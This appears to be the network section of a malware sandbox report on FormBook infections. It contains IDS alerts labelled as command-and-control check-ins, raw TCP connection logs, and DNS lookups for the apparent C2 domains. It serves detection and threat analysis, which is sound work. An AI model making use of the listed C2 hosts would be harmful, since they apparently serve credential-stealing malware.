                                                                     2025-01-03T11:40:13.231825+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49859 | 104.21.18.171 | 80 | TCP
                                                                     2025-01-03T11:40:15.808369+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49875 | 104.21.18.171 | 80 | TCP
                                                                     2025-01-03T11:40:18.425050+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49891 | 104.21.18.171 | 80 | TCP
                                                                     2025-01-03T11:40:21.031425+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49912 | 104.21.18.171 | 80 | TCP
                                                                     2025-01-03T11:40:21.031425+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49912 | 104.21.18.171 | 80 | TCP
                                                                     2025-01-03T11:40:27.236732+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49953 | 134.122.133.80 | 80 | TCP
                                                                     2025-01-03T11:40:29.786086+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49969 | 134.122.133.80 | 80 | TCP
                                                                     2025-01-03T11:40:32.362799+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49988 | 134.122.133.80 | 80 | TCP
                                                                     2025-01-03T11:40:34.899049+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50004 | 134.122.133.80 | 80 | TCP
                                                                     2025-01-03T11:40:34.899049+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50004 | 134.122.133.80 | 80 | TCP
                                                                     2025-01-03T11:40:40.573071+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50015 | 199.192.21.169 | 80 | TCP
                                                                     2025-01-03T11:40:43.116447+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50016 | 199.192.21.169 | 80 | TCP
                                                                     2025-01-03T11:40:45.762531+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50017 | 199.192.21.169 | 80 | TCP
                                                                     2025-01-03T11:40:48.229476+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50018 | 199.192.21.169 | 80 | TCP
                                                                     2025-01-03T11:40:48.229476+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50018 | 199.192.21.169 | 80 | TCP
                                                                     2025-01-03T11:40:54.204900+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50019 | 154.197.162.239 | 80 | TCP
                                                                     2025-01-03T11:40:56.792856+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50020 | 154.197.162.239 | 80 | TCP
                                                                     2025-01-03T11:40:59.463232+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50021 | 154.197.162.239 | 80 | TCP
                                                                     2025-01-03T11:41:01.916844+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50022 | 154.197.162.239 | 80 | TCP
                                                                     2025-01-03T11:41:01.916844+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50022 | 154.197.162.239 | 80 | TCP
                                                                     2025-01-03T11:41:07.454582+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50023 | 84.32.84.32 | 80 | TCP
                                                                     2025-01-03T11:41:10.011574+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50024 | 84.32.84.32 | 80 | TCP
                                                                     2025-01-03T11:41:12.555308+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50025 | 84.32.84.32 | 80 | TCP
                                                                     2025-01-03T11:41:15.122175+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50026 | 84.32.84.32 | 80 | TCP
                                                                     2025-01-03T11:41:15.122175+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50026 | 84.32.84.32 | 80 | TCP
                                                                     2025-01-03T11:41:21.487271+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50027 | 134.122.133.80 | 80 | TCP
                                                                     2025-01-03T11:41:24.041121+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50028 | 134.122.133.80 | 80 | TCP
                                                                     2025-01-03T11:41:26.596097+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50029 | 134.122.133.80 | 80 | TCP
                                                                     2025-01-03T11:41:29.157934+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50030 | 134.122.133.80 | 80 | TCP
                                                                     2025-01-03T11:41:29.157934+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50030 | 134.122.133.80 | 80 | TCP
                                                                     2025-01-03T11:41:35.730610+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50031 | 47.83.1.90 | 80 | TCP
                                                                     2025-01-03T11:41:38.276125+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50032 | 47.83.1.90 | 80 | TCP
                                                                     2025-01-03T11:41:40.822991+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50033 | 47.83.1.90 | 80 | TCP
                                                                     2025-01-03T11:41:43.461990+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50034 | 47.83.1.90 | 80 | TCP
                                                                     2025-01-03T11:41:43.461990+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50034 | 47.83.1.90 | 80 | TCP
                                                                     2025-01-03T11:41:49.027167+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50035 | 188.114.97.3 | 80 | TCP
                                                                     2025-01-03T11:41:51.582140+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50036 | 188.114.97.3 | 80 | TCP
                                                                     2025-01-03T11:41:54.160245+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50037 | 188.114.97.3 | 80 | TCP
                                                                     2025-01-03T11:41:56.688749+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50038 | 188.114.97.3 | 80 | TCP
                                                                     2025-01-03T11:41:56.688749+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50038 | 188.114.97.3 | 80 | TCP
                                                                     2025-01-03T11:42:10.330134+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50039 | 199.59.243.228 | 80 | TCP
                                                                     2025-01-03T11:42:12.888933+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50040 | 199.59.243.228 | 80 | TCP
                                                                     2025-01-03T11:42:15.456146+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50041 | 199.59.243.228 | 80 | TCP
                                                                     2025-01-03T11:42:18.010612+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50042 | 199.59.243.228 | 80 | TCP
                                                                     2025-01-03T11:42:18.010612+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50042 | 199.59.243.228 | 80 | TCP
                                                                     2025-01-03T11:42:24.032658+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50043 | 13.228.81.39 | 80 | TCP
                                                                     2025-01-03T11:42:26.620947+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50044 | 13.228.81.39 | 80 | TCP
                                                                     2025-01-03T11:42:29.200835+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50045 | 13.228.81.39 | 80 | TCP
                                                                     2025-01-03T11:42:31.693060+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50046 | 13.228.81.39 | 80 | TCP
                                                                     2025-01-03T11:42:31.693060+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50046 | 13.228.81.39 | 80 | TCP
                                                                     2025-01-03T11:42:38.776296+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50047 | 154.39.239.237 | 80 | TCP
                                                                     2025-01-03T11:42:41.370252+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50048 | 154.39.239.237 | 80 | TCP
                                                                     2025-01-03T11:42:43.950799+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50049 | 154.39.239.237 | 80 | TCP
                                                                    Jan 3, 2025 11:41:08.530937910 CET805002384.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:41:09.544744968 CET5002480192.168.2.484.32.84.32
                                                                    Jan 3, 2025 11:41:09.551539898 CET805002484.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:41:09.554598093 CET5002480192.168.2.484.32.84.32
                                                                    Jan 3, 2025 11:41:09.568043947 CET5002480192.168.2.484.32.84.32
                                                                    Jan 3, 2025 11:41:09.573671103 CET805002484.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:41:10.011513948 CET805002484.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:41:10.011574030 CET5002480192.168.2.484.32.84.32
                                                                    Jan 3, 2025 11:41:11.078532934 CET5002480192.168.2.484.32.84.32
                                                                    Jan 3, 2025 11:41:11.085309982 CET805002484.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:41:12.092372894 CET5002580192.168.2.484.32.84.32
                                                                    Jan 3, 2025 11:41:12.097297907 CET805002584.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:41:12.097366095 CET5002580192.168.2.484.32.84.32
                                                                    Jan 3, 2025 11:41:12.116695881 CET5002580192.168.2.484.32.84.32
                                                                    Jan 3, 2025 11:41:12.121560097 CET805002584.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:41:12.121571064 CET805002584.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:41:12.121603966 CET805002584.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:41:12.121613979 CET805002584.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:41:12.121699095 CET805002584.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:41:12.121707916 CET805002584.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:41:12.121722937 CET805002584.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:41:12.121731043 CET805002584.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:41:12.121751070 CET805002584.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:41:12.555249929 CET805002584.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:41:12.555308104 CET5002580192.168.2.484.32.84.32
                                                                    Jan 3, 2025 11:41:13.619757891 CET5002580192.168.2.484.32.84.32
                                                                    Jan 3, 2025 11:41:13.624661922 CET805002584.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:41:14.638473034 CET5002680192.168.2.484.32.84.32
                                                                    Jan 3, 2025 11:41:14.643435955 CET805002684.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:41:14.643517017 CET5002680192.168.2.484.32.84.32
                                                                    Jan 3, 2025 11:41:14.652565956 CET5002680192.168.2.484.32.84.32
                                                                    Jan 3, 2025 11:41:14.657383919 CET805002684.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:41:15.122035980 CET805002684.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:41:15.122052908 CET805002684.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:41:15.122064114 CET805002684.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:41:15.122075081 CET805002684.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:41:15.122085094 CET805002684.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:41:15.122096062 CET805002684.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:41:15.122108936 CET805002684.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:41:15.122118950 CET805002684.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:41:15.122129917 CET805002684.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:41:15.122140884 CET805002684.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:41:15.122174978 CET5002680192.168.2.484.32.84.32
                                                                    Jan 3, 2025 11:41:15.122349024 CET5002680192.168.2.484.32.84.32
                                                                    Jan 3, 2025 11:41:15.128559113 CET5002680192.168.2.484.32.84.32
                                                                    Jan 3, 2025 11:41:15.133302927 CET805002684.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:41:20.587212086 CET5002780192.168.2.4134.122.133.80
                                                                    Jan 3, 2025 11:41:20.592040062 CET8050027134.122.133.80192.168.2.4
                                                                    Jan 3, 2025 11:41:20.592117071 CET5002780192.168.2.4134.122.133.80
                                                                    Jan 3, 2025 11:41:20.609915972 CET5002780192.168.2.4134.122.133.80
                                                                    Jan 3, 2025 11:41:20.614720106 CET8050027134.122.133.80192.168.2.4
                                                                    Jan 3, 2025 11:41:21.487103939 CET8050027134.122.133.80192.168.2.4
                                                                    Jan 3, 2025 11:41:21.487133980 CET8050027134.122.133.80192.168.2.4
                                                                    Jan 3, 2025 11:41:21.487271070 CET5002780192.168.2.4134.122.133.80
                                                                    Jan 3, 2025 11:41:22.127985954 CET5002780192.168.2.4134.122.133.80
                                                                    Jan 3, 2025 11:41:23.139203072 CET5002880192.168.2.4134.122.133.80
                                                                    Jan 3, 2025 11:41:23.144093990 CET8050028134.122.133.80192.168.2.4
                                                                    Jan 3, 2025 11:41:23.146616936 CET5002880192.168.2.4134.122.133.80
                                                                    Jan 3, 2025 11:41:23.169585943 CET5002880192.168.2.4134.122.133.80
                                                                    Jan 3, 2025 11:41:23.174475908 CET8050028134.122.133.80192.168.2.4
                                                                    Jan 3, 2025 11:41:24.040982962 CET8050028134.122.133.80192.168.2.4
                                                                    Jan 3, 2025 11:41:24.041069031 CET8050028134.122.133.80192.168.2.4
                                                                    Jan 3, 2025 11:41:24.041121006 CET5002880192.168.2.4134.122.133.80
                                                                    Jan 3, 2025 11:41:24.708722115 CET5002880192.168.2.4134.122.133.80
                                                                    Jan 3, 2025 11:41:25.716743946 CET5002980192.168.2.4134.122.133.80
                                                                    Jan 3, 2025 11:41:25.721601963 CET8050029134.122.133.80192.168.2.4
                                                                    Jan 3, 2025 11:41:25.721740961 CET5002980192.168.2.4134.122.133.80
                                                                    Jan 3, 2025 11:41:25.737158060 CET5002980192.168.2.4134.122.133.80
                                                                    Jan 3, 2025 11:41:25.742043972 CET8050029134.122.133.80192.168.2.4
                                                                    Jan 3, 2025 11:41:25.742055893 CET8050029134.122.133.80192.168.2.4
                                                                    Jan 3, 2025 11:41:25.742072105 CET8050029134.122.133.80192.168.2.4
                                                                    Jan 3, 2025 11:41:25.742104053 CET8050029134.122.133.80192.168.2.4
                                                                    Jan 3, 2025 11:41:25.742229939 CET8050029134.122.133.80192.168.2.4
                                                                    Jan 3, 2025 11:41:25.742237091 CET8050029134.122.133.80192.168.2.4
                                                                    Jan 3, 2025 11:41:25.742309093 CET8050029134.122.133.80192.168.2.4
                                                                    Jan 3, 2025 11:41:25.742316961 CET8050029134.122.133.80192.168.2.4
                                                                    Jan 3, 2025 11:41:25.742335081 CET8050029134.122.133.80192.168.2.4
                                                                    Jan 3, 2025 11:41:26.595901966 CET8050029134.122.133.80192.168.2.4
                                                                    Jan 3, 2025 11:41:26.596040010 CET8050029134.122.133.80192.168.2.4
                                                                    Jan 3, 2025 11:41:26.596096992 CET5002980192.168.2.4134.122.133.80
                                                                    Jan 3, 2025 11:41:27.245007038 CET5002980192.168.2.4134.122.133.80
                                                                    Jan 3, 2025 11:41:28.269845963 CET5003080192.168.2.4134.122.133.80
                                                                    Jan 3, 2025 11:41:28.274718046 CET8050030134.122.133.80192.168.2.4
                                                                    Jan 3, 2025 11:41:28.274791956 CET5003080192.168.2.4134.122.133.80
                                                                    Jan 3, 2025 11:41:28.286664963 CET5003080192.168.2.4134.122.133.80
                                                                    Jan 3, 2025 11:41:28.291501999 CET8050030134.122.133.80192.168.2.4
                                                                    Jan 3, 2025 11:41:29.157627106 CET8050030134.122.133.80192.168.2.4
                                                                    Jan 3, 2025 11:41:29.157730103 CET8050030134.122.133.80192.168.2.4
                                                                    Jan 3, 2025 11:41:29.157933950 CET5003080192.168.2.4134.122.133.80
                                                                    Jan 3, 2025 11:41:29.160418034 CET5003080192.168.2.4134.122.133.80
                                                                    Jan 3, 2025 11:41:29.165168047 CET8050030134.122.133.80192.168.2.4
                                                                    Jan 3, 2025 11:41:34.195708036 CET5003180192.168.2.447.83.1.90
                                                                    Jan 3, 2025 11:41:34.200572014 CET805003147.83.1.90192.168.2.4
                                                                    Jan 3, 2025 11:41:34.200639963 CET5003180192.168.2.447.83.1.90
                                                                    Jan 3, 2025 11:41:34.214912891 CET5003180192.168.2.447.83.1.90
                                                                    Jan 3, 2025 11:41:34.219690084 CET805003147.83.1.90192.168.2.4
                                                                    Jan 3, 2025 11:41:35.730609894 CET5003180192.168.2.447.83.1.90
                                                                    Jan 3, 2025 11:41:35.735833883 CET805003147.83.1.90192.168.2.4
                                                                    Jan 3, 2025 11:41:35.737905979 CET5003180192.168.2.447.83.1.90
                                                                    Jan 3, 2025 11:41:36.747453928 CET5003280192.168.2.447.83.1.90
                                                                    Jan 3, 2025 11:41:36.752307892 CET805003247.83.1.90192.168.2.4
                                                                    Jan 3, 2025 11:41:36.752470970 CET5003280192.168.2.447.83.1.90
                                                                    Jan 3, 2025 11:41:36.765196085 CET5003280192.168.2.447.83.1.90
                                                                    Jan 3, 2025 11:41:36.770081043 CET805003247.83.1.90192.168.2.4
                                                                    Jan 3, 2025 11:41:38.276124954 CET5003280192.168.2.447.83.1.90
                                                                    Jan 3, 2025 11:41:38.281209946 CET805003247.83.1.90192.168.2.4
                                                                    Jan 3, 2025 11:41:38.281254053 CET5003280192.168.2.447.83.1.90
                                                                    Jan 3, 2025 11:41:39.296735048 CET5003380192.168.2.447.83.1.90
                                                                    Jan 3, 2025 11:41:39.301645994 CET805003347.83.1.90192.168.2.4
                                                                    Jan 3, 2025 11:41:39.301877022 CET5003380192.168.2.447.83.1.90
                                                                    Jan 3, 2025 11:41:39.317044020 CET5003380192.168.2.447.83.1.90
                                                                    Jan 3, 2025 11:41:39.321886063 CET805003347.83.1.90192.168.2.4
                                                                    Jan 3, 2025 11:41:39.321896076 CET805003347.83.1.90192.168.2.4
                                                                    Jan 3, 2025 11:41:39.321969032 CET805003347.83.1.90192.168.2.4
                                                                    Jan 3, 2025 11:41:39.321976900 CET805003347.83.1.90192.168.2.4
                                                                    Jan 3, 2025 11:41:39.321986914 CET805003347.83.1.90192.168.2.4
                                                                    Jan 3, 2025 11:41:39.322119951 CET805003347.83.1.90192.168.2.4
                                                                    Jan 3, 2025 11:41:39.322128057 CET805003347.83.1.90192.168.2.4
                                                                    Jan 3, 2025 11:41:39.322163105 CET805003347.83.1.90192.168.2.4
                                                                    Jan 3, 2025 11:41:39.322170019 CET805003347.83.1.90192.168.2.4
                                                                    Jan 3, 2025 11:41:40.822990894 CET5003380192.168.2.447.83.1.90
                                                                    Jan 3, 2025 11:41:40.828147888 CET805003347.83.1.90192.168.2.4
                                                                    Jan 3, 2025 11:41:40.828197956 CET5003380192.168.2.447.83.1.90
                                                                    Jan 3, 2025 11:41:41.866643906 CET5003480192.168.2.447.83.1.90
                                                                    Jan 3, 2025 11:41:41.871737957 CET805003447.83.1.90192.168.2.4
                                                                    Jan 3, 2025 11:41:41.878623009 CET5003480192.168.2.447.83.1.90
                                                                    Jan 3, 2025 11:41:41.884637117 CET5003480192.168.2.447.83.1.90
                                                                    Jan 3, 2025 11:41:41.889400005 CET805003447.83.1.90192.168.2.4
                                                                    Jan 3, 2025 11:41:43.461720943 CET805003447.83.1.90192.168.2.4
                                                                    Jan 3, 2025 11:41:43.461880922 CET805003447.83.1.90192.168.2.4
                                                                    Jan 3, 2025 11:41:43.461990118 CET5003480192.168.2.447.83.1.90
                                                                    Jan 3, 2025 11:41:43.464211941 CET5003480192.168.2.447.83.1.90
                                                                    Jan 3, 2025 11:41:43.468969107 CET805003447.83.1.90192.168.2.4
                                                                    Jan 3, 2025 11:41:48.506700039 CET5003580192.168.2.4188.114.97.3
                                                                    Jan 3, 2025 11:41:48.511543989 CET8050035188.114.97.3192.168.2.4
                                                                    Jan 3, 2025 11:41:48.511607885 CET5003580192.168.2.4188.114.97.3
                                                                    Jan 3, 2025 11:41:48.531265020 CET5003580192.168.2.4188.114.97.3
                                                                    Jan 3, 2025 11:41:48.536025047 CET8050035188.114.97.3192.168.2.4
                                                                    Jan 3, 2025 11:41:49.026953936 CET8050035188.114.97.3192.168.2.4
                                                                    Jan 3, 2025 11:41:49.026968956 CET8050035188.114.97.3192.168.2.4
                                                                    Jan 3, 2025 11:41:49.027154922 CET8050035188.114.97.3192.168.2.4
                                                                    Jan 3, 2025 11:41:49.027167082 CET5003580192.168.2.4188.114.97.3
                                                                    Jan 3, 2025 11:41:49.027285099 CET5003580192.168.2.4188.114.97.3
                                                                    Jan 3, 2025 11:41:50.041785955 CET5003580192.168.2.4188.114.97.3
                                                                    Jan 3, 2025 11:41:51.061490059 CET5003680192.168.2.4188.114.97.3
                                                                    Jan 3, 2025 11:41:51.066490889 CET8050036188.114.97.3192.168.2.4
                                                                    Jan 3, 2025 11:41:51.068852901 CET5003680192.168.2.4188.114.97.3
                                                                    Jan 3, 2025 11:41:51.082818031 CET5003680192.168.2.4188.114.97.3
                                                                    Jan 3, 2025 11:41:51.087635040 CET8050036188.114.97.3192.168.2.4
                                                                    Jan 3, 2025 11:41:51.582040071 CET8050036188.114.97.3192.168.2.4
                                                                    Jan 3, 2025 11:41:51.582056046 CET8050036188.114.97.3192.168.2.4
                                                                    Jan 3, 2025 11:41:51.582139969 CET5003680192.168.2.4188.114.97.3
                                                                    Jan 3, 2025 11:41:51.582298994 CET8050036188.114.97.3192.168.2.4
                                                                    Jan 3, 2025 11:41:51.582670927 CET5003680192.168.2.4188.114.97.3
                                                                    Jan 3, 2025 11:41:52.588690996 CET5003680192.168.2.4188.114.97.3
                                                                    Jan 3, 2025 11:41:53.607250929 CET5003780192.168.2.4188.114.97.3
                                                                    Jan 3, 2025 11:41:53.612132072 CET8050037188.114.97.3192.168.2.4
                                                                    Jan 3, 2025 11:41:53.614734888 CET5003780192.168.2.4188.114.97.3
                                                                    Jan 3, 2025 11:41:53.628392935 CET5003780192.168.2.4188.114.97.3
                                                                    Jan 3, 2025 11:41:53.633321047 CET8050037188.114.97.3192.168.2.4
                                                                    Jan 3, 2025 11:41:53.633332968 CET8050037188.114.97.3192.168.2.4
                                                                    Jan 3, 2025 11:41:53.633366108 CET8050037188.114.97.3192.168.2.4
                                                                    Jan 3, 2025 11:41:53.633374929 CET8050037188.114.97.3192.168.2.4
                                                                    Jan 3, 2025 11:41:53.633414984 CET8050037188.114.97.3192.168.2.4
                                                                    Jan 3, 2025 11:41:53.633423090 CET8050037188.114.97.3192.168.2.4
                                                                    Jan 3, 2025 11:41:53.633508921 CET8050037188.114.97.3192.168.2.4
                                                                    Jan 3, 2025 11:41:53.633517981 CET8050037188.114.97.3192.168.2.4
                                                                    Jan 3, 2025 11:41:53.633527040 CET8050037188.114.97.3192.168.2.4
                                                                    Jan 3, 2025 11:41:54.160147905 CET8050037188.114.97.3192.168.2.4
                                                                    Jan 3, 2025 11:41:54.160170078 CET8050037188.114.97.3192.168.2.4
                                                                    Jan 3, 2025 11:41:54.160244942 CET5003780192.168.2.4188.114.97.3
                                                                    Jan 3, 2025 11:41:54.160552979 CET8050037188.114.97.3192.168.2.4
                                                                    Jan 3, 2025 11:41:54.160617113 CET5003780192.168.2.4188.114.97.3
                                                                    Jan 3, 2025 11:41:55.135587931 CET5003780192.168.2.4188.114.97.3
                                                                    Jan 3, 2025 11:41:56.154232979 CET5003880192.168.2.4188.114.97.3
                                                                    Jan 3, 2025 11:41:56.159132004 CET8050038188.114.97.3192.168.2.4
                                                                    Jan 3, 2025 11:41:56.159198999 CET5003880192.168.2.4188.114.97.3
                                                                    Jan 3, 2025 11:41:56.167958021 CET5003880192.168.2.4188.114.97.3
                                                                    Jan 3, 2025 11:41:56.172743082 CET8050038188.114.97.3192.168.2.4
                                                                    Jan 3, 2025 11:41:56.688426018 CET8050038188.114.97.3192.168.2.4
                                                                    Jan 3, 2025 11:41:56.688708067 CET8050038188.114.97.3192.168.2.4
                                                                    Jan 3, 2025 11:41:56.688749075 CET5003880192.168.2.4188.114.97.3
                                                                    Jan 3, 2025 11:41:56.692065001 CET5003880192.168.2.4188.114.97.3
                                                                    Jan 3, 2025 11:41:56.696788073 CET8050038188.114.97.3192.168.2.4
                                                                    Jan 3, 2025 11:42:09.854713917 CET5003980192.168.2.4199.59.243.228
                                                                    Jan 3, 2025 11:42:09.859523058 CET8050039199.59.243.228192.168.2.4
                                                                    Jan 3, 2025 11:42:09.866725922 CET5003980192.168.2.4199.59.243.228
                                                                    Jan 3, 2025 11:42:09.878700972 CET5003980192.168.2.4199.59.243.228
                                                                    Jan 3, 2025 11:42:09.883529902 CET8050039199.59.243.228192.168.2.4
                                                                    Jan 3, 2025 11:42:10.330044031 CET8050039199.59.243.228192.168.2.4
                                                                    Jan 3, 2025 11:42:10.330059052 CET8050039199.59.243.228192.168.2.4
                                                                    Jan 3, 2025 11:42:10.330068111 CET8050039199.59.243.228192.168.2.4
                                                                    Jan 3, 2025 11:42:10.330133915 CET5003980192.168.2.4199.59.243.228
                                                                    Jan 3, 2025 11:42:11.385596991 CET5003980192.168.2.4199.59.243.228
                                                                    Jan 3, 2025 11:42:12.405374050 CET5004080192.168.2.4199.59.243.228
                                                                    Jan 3, 2025 11:42:12.410243988 CET8050040199.59.243.228192.168.2.4
                                                                    Jan 3, 2025 11:42:12.410305023 CET5004080192.168.2.4199.59.243.228
                                                                    Jan 3, 2025 11:42:12.427670002 CET5004080192.168.2.4199.59.243.228
                                                                    Jan 3, 2025 11:42:12.432444096 CET8050040199.59.243.228192.168.2.4
                                                                    Jan 3, 2025 11:42:12.888844967 CET8050040199.59.243.228192.168.2.4
                                                                    Jan 3, 2025 11:42:12.888873100 CET8050040199.59.243.228192.168.2.4
                                                                    Jan 3, 2025 11:42:12.888883114 CET8050040199.59.243.228192.168.2.4
                                                                    Jan 3, 2025 11:42:12.888932943 CET5004080192.168.2.4199.59.243.228
                                                                    Jan 3, 2025 11:42:13.938641071 CET5004080192.168.2.4199.59.243.228
                                                                    Jan 3, 2025 11:42:14.951845884 CET5004180192.168.2.4199.59.243.228
                                                                    Jan 3, 2025 11:42:14.956753016 CET8050041199.59.243.228192.168.2.4
                                                                    Jan 3, 2025 11:42:14.956818104 CET5004180192.168.2.4199.59.243.228
                                                                    Jan 3, 2025 11:42:14.972227097 CET5004180192.168.2.4199.59.243.228
                                                                    Jan 3, 2025 11:42:14.977034092 CET8050041199.59.243.228192.168.2.4
                                                                    Jan 3, 2025 11:42:14.977042913 CET8050041199.59.243.228192.168.2.4
                                                                    Jan 3, 2025 11:42:14.977077961 CET8050041199.59.243.228192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 3, 2025 11:39:42.526709080 CET | 192.168.2.4 | 1.1.1.1 | 0xd110 | Standard query (0) | www.gayhxi.info | A (IP address) | IN (0x0001) | false
Jan 3, 2025 11:39:59.238432884 CET | 192.168.2.4 | 1.1.1.1 | 0x55cc | Standard query (0) | www.promocao.info | A (IP address) | IN (0x0001) | false
Jan 3, 2025 11:40:12.560419083 CET | 192.168.2.4 | 1.1.1.1 | 0x3435 | Standard query (0) | www.grimbo.boats | A (IP address) | IN (0x0001) | false
Jan 3, 2025 11:40:26.044958115 CET | 192.168.2.4 | 1.1.1.1 | 0xbb00 | Standard query (0) | www.44756.pizza | A (IP address) | IN (0x0001) | false
Jan 3, 2025 11:40:39.936544895 CET | 192.168.2.4 | 1.1.1.1 | 0xba83 | Standard query (0) | www.lonfor.website | A (IP address) | IN (0x0001) | false
